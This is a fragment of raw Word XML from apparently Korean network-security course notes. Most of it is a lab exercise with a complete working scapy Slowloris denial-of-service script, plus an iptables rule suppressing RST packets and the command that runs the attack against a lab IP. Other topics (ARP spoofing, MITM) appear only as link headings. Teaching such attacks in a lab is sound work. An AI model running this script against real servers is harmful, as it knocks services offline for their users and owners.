          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Scanning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@Kali#1에 apache2, vsftp 서비스를 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071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 service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071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# service vsftpd start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071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@Kali#2에서 Kali#1으로 웹 서비스 요청과 FTP 서비스 요청을 할 수 있음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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1r9smywf73z4" w:id="53"/>
      <w:bookmarkEnd w:id="5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ARP Spoofing ⇒ </w:t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https://myanjini.tistory.com/76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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1r9smywf73z4" w:id="53"/>
      <w:bookmarkEnd w:id="5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MTM(Man in The Middle) attack ⇒ </w:t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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1r9smywf73z4" w:id="53"/>
      <w:bookmarkEnd w:id="5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scapy 사용법 ⇒ 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https://myanjini.tistory.com/78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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1r9smywf73z4" w:id="53"/>
      <w:bookmarkEnd w:id="5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scapy를 이용한 3 way handshaking ⇒ </w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4em17sy5upzk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TCP SYN Flooding ⇒ </w:t>
      </w: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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Slowloris Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072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 요청 헤더와 본문이 개행문자로 구분되는 특징을 이용한 공격 = 요청 헤더의 끝이 개행문자로 끝나는 것을 활용한 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072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요청 헤더의 끝을 나타내는 개행문자를 서버로 전달하지 않고, 헤더를 계속해서 전달해, 연결을 유지시키는 공격 기법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali:~# gedit slowloris.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13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#! /usr/bin/env python</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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sys</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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7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scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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slowloris (target, num) :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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print "start connect &gt; {}".format(target)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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syn = []</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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for i in range(num) :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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syn.append(IP(dst=target)/TCP(sport=RandNum(1024,65535),dport=80,flags='S'))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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syn_ack = sr(syn, verbose=0)[0]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ack = []</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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for sa in syn_ack :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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payload = "GET /{} HTTP/1.1\r\n".format(str(RandNum(1,num))) +\</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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"Host: {}\r\n".format(target) +\</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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"User-Agent: Mozilla/4.0\r\n" +\</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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"Content-Length: 42\r\n"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ack.append(IP(dst=target)/TCP(sport=sa[1].dport,dport=80,flags="A",seq=sa[1].ack,ack=sa[1].seq+1)/payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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7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answer = sr(ack, verbose=0)[0]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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print "{} connection success!\t Fail: {}".format(len(answer), num-len(answer))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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print "Sending data \"X-a: b\\r\\n\".."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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count = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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while True :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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print "{} time sending".format(count)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ack = []</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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for ans in answer :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ack.append(IP(dst=target)/TCP(sport=ans[1].dport,dport=80,flags="PA",seq=ans[1].ack,ack=ans[1].seq)/"X-a: b\r\n")</w:t>
            </w:r>
          </w:p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answer = sr(ack, inter=0.5, verbose=0)[0]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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time.sleep(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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count += 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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__name__ == "__main__" :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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if len(sys.argv) &lt; 3 :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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print "Usage: {} &lt;target&gt; &lt;number of connection&gt;".format(sys.argv[0])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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slowloris(sys.argv[1], int(sys.argv[2]))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#2에서 해당 파일에 실행 속성을 부여</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000751">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># chmod 755 slowloris.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#1에서 아파치 서버 실행하고 IP를 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000754">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000755">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#2에서 외부로 RST 패킷이 나가지 않도록 방화벽에 룰을 등록</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000758">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>
        <w:tblW w:w="11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615"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="116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root@kali:~# iptables -L</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Chain INPUT (policy ACCEPT)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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target     prot opt source               destination         </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Chain FORWARD (policy ACCEPT)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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target     prot opt source               destination         </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Chain OUTPUT (policy ACCEPT)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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target     prot opt source               destination         </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000762">
            <w:pPr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DROP       tcp  --  anywhere             anywhere             tcp flags:RST/RST</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#2에서 공격 명령 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000767">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># ./slowloris.py 192.168.111.130 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#1에서 브라우저를 통해서 연결을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost/server-status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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375650" cy="4737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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#1에서 wireshark 실행 후 Kali#2에서 ./slowloris.py 를 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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375650" cy="4737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70627" cy="230981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627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83930" cy="230028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930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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy 도구 사용법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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375650" cy="21717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56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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#1에서 mysql을 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># service mysql restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#2에서 Kali#1으로 접속 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000782">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.111.130 ⇒ 로그인 화면 출력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://docs.google.com/document/d/1v-2kBAJDW8WWmehdm_z2uenAMeS6dtBTNpBrlOrqL4s/edit?usp=sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali#1, Kali#2 다운로드 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pP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http://70.12.50.160:8282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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">수행평가 풀이 03 ⇒ </w:t>
      </w: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https://myanjini.tistory.com/81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.0000000000002" w:top="1440.0000000000002" w:left="141.73228346456693" w:right="153.070866141732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Dotum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Dotum" w:cs="Dotum" w:eastAsia="Dotum" w:hAnsi="Dotum"/>
        <w:color w:val="555555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Gothic Coding" w:cs="Nanum Gothic Coding" w:eastAsia="Nanum Gothic Coding" w:hAnsi="Nanum Gothic Coding"/>
        <w:color w:val="434343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b w:val="1"/>
      <w:color w:val="07376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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:color w:val="0b539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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/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</w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b w:val="1"/>
      <w:color w:val="00000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qnap.com/ko-kr/how-to/faq/article/intel-vt-x%EC%99%80-amd-svm%EC%9D%84-%ED%99%9C%EC%84%B1%ED%99%94%ED%95%98%EB%8A%94-%EB%B0%A9%EB%B2%95/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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kisa.or.kr/public/laws/laws3.jsp" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/commandline/cli/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pyrasis.com/docker.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/pyrasis/docker-fordummies-44424016" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/ko/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opentutorials.org/course/1/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/java" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/81" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kisq.or.kr/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=rhP5pseOJc0&amp;list=PLRx0vPvlEmdD5FLIdwTM4mKBgyjv4no81" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/19757966?scode=032&amp;OzSrank=2" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crefunx.tistory.com/35" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crefunx.tistory.com/search/slowloris" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://70.12.50.160:8282/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/72" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/77" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/76" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/57287123?scode=032&amp;OzSrank=31" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/79" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/78" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lisk.io/academy/welcome-to-the-lisk-academy" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yes24.com/Product/Goods/69279313?scode=032&amp;OzSrank=6" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/80" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/cs50tv" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myanjini.tistory.com/75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69" 